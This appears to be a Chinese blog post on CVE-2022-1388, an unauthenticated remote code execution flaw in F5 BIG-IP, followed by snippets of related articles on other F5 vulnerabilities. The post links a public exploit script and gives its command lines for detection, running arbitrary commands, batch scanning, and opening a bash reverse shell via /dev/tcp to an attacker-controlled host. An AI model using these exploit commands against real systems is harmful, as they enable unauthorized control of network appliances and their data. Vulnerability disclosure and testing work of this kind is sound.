代码编织梦想

影响产品

  • F5 BIG-IP 11.6.1 - 11.6.5
  • F5 BIG-IP 12.1.0 - 12.1.6
  • F5 BIG-IP 13.1.0 - 13.1.4
  • F5 BIG-IP 14.1.0 - 14.1.4
  • F5 BIG-IP 15.1.0 - 15.1.5
  • F5 BIG-IP 16.1.0 - 16.1.2

漏洞影响

此漏洞可能允许未经身份验证的攻击者通过管理端口和/或自身IP地址对BIG-IP系统进行网络访问,以执行任意系统命令、创建或删除文件或禁用服务

漏洞检测

检测脚本:https://github.com/Al1ex/CVE-2022-1388 

基本用法

python3 CVE_2022_1388.py

漏洞检测

python3 CVE_2022_1388.py -v true -u https://192.168.17.200

 

 命令执行

python3 CVE_2022_1388.py -a true -u https://192.168.17.200/ -c id

python3 CVE_2022_1388.py -a true -u https://192.168.17.200/ -c whoami

 批量检测

python3 CVE_2022_1388.py -s true -f check.txt

 反弹shell

python3 CVE_2022_1388.py -r true -u https://192.168.17.200 -c "bash -i >&/dev/tcp/192.168.17.175/8888 0>&1"

版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Fly_hps/article/details/124728586

F5 BIG-IP远程代码执行漏洞-爱代码爱编程

 F5 RCE和Getshell 0x01 漏洞概述 在 F5 BIG-IP 产品的流量管理用户页面 (TMUI)/配置实用程序的特定页面中存在一处远程代码执行漏洞。 未授权的远程攻击者通过向该页面发送特制的请求包,可以造成任意Java 代码执行。进而控制 F5 BIG-IP 的全部功能,包括但不限于: 执行任意系统命令、开启/禁用服务、创建/删除服

F5紧急修复严重的 BIG-IP 预认证 RCE 漏洞-爱代码爱编程

 聚焦源代码安全,网罗国内外最新资讯! 编译:奇安信代码卫士团队 全球顶级企业网络设备巨头 F5 Networks 发现影响多数 BIG-IP 和 BIG-IP软件版本的四个严重的远程代码执行 (RCE) 漏洞。 F5 BIG-IP 软件和硬件客户包括政府部门、全球财富500强公司、银行、互联网服务提供商和客户品牌(如微软、Oracle

F5 BIG-IP iControl RCE (CVE-2021-22986)-爱代码爱编程

漏洞描述 F5 BIG-IP 是美国 F5 公司的一款集成了网络流量管理、应用程序安全管理、负载均衡等功能的应用交付平台。 1、CVE-2021-22986 BIG-IP/BIG-IQ iControl REST 未授权远程代码执行漏洞 中,未经身份验证的攻击者可通过iControl REST接口,构造恶意请求,执行任意系统命令。 2、CVE-202

CVE-2021-22986 F5 BIG-IP 远程代码执行漏洞复现-爱代码爱编程

F5 BIG-IP F5 BIG-IP 链路控制器用于最大限度提升链路性能与可用性的下一代广域网链路流量管理。 漏洞简介 F5 BIG-IP 存在代码执行漏洞,该漏洞允许定义身份验证的攻击者通过 BIG-IP 管理界面和自身IP地址对 iControl REST 接口进行网络访问,以执行任意系统命令,控制目标机器。 影响版本 F5 BIG-IP

2021HW | 04/10 第二天总结-爱代码爱编程

更多黑客技能 公众号:白帽子左一 可能因为第一天用力过猛吧,相对而言显得比较安静。 蓝队局点普遍反映攻击流量略微有点小,甚至有人一度怀疑是红队人员没吃饱饭! 但也有个别说快被打穿了。。。 看来攻击的目标都是很集中的,先挑软柿子捏吧 兄dei们,千万不要放松警惕,尤其是钓鱼攻击! 虽然大多数防守相对很安静,但是还是要提高警惕

BIG-IP/BIG-IQ未授权RCE(CVE-2021-22986)-爱代码爱编程

F5简介 F5 BIG-IP是美国 F5 公司的一款集成了网络流量管理、应用程序安全管理、负载均衡等功能的应用交付平台。 漏洞概述 F5 BIG-IP/BIG-IQ iControl REST 未授权远程代码执行漏洞中,未经身份验证的攻击者可通过iControl REST接口,构造恶意请求,执行任意系统命令。 影响版本 F5 BIG-IP 16.

2021年物联网设备CVE天梯榜-爱代码爱编程

2021年物联网设备CVE天梯榜 时间飞逝,转眼间来到了2022年。新的一年即将开始,一年即将开始,让我们来回顾一下2021年的物联网设备CVE情况。2021年CVSSV3平均值为5.5,2020年CVSSV3平均值为6.1,同比去年下降0.6。通过平均值的对比,我们可以清楚的看到各大厂商在2021年对物联网安全的重视性越来越高,产品也越来越安全。物联网

[cve-爱代码爱编程

一、背景 F5 BIG-IP产品系列包括运行F5 TMOS操作系统的硬件、模块化软件和虚拟设备。根据所选设备,可以添加一个或多个 BIG-IP 产品模块。 产品包括: BIG-IP 本地流量管理器 (LTM) :基于全代理架构,具有缓存、压缩和 tcp 加速的本地负载平衡。 BIG-IP DNS:智能全球站点负载平衡 (GSLB) 和权威 DNS 服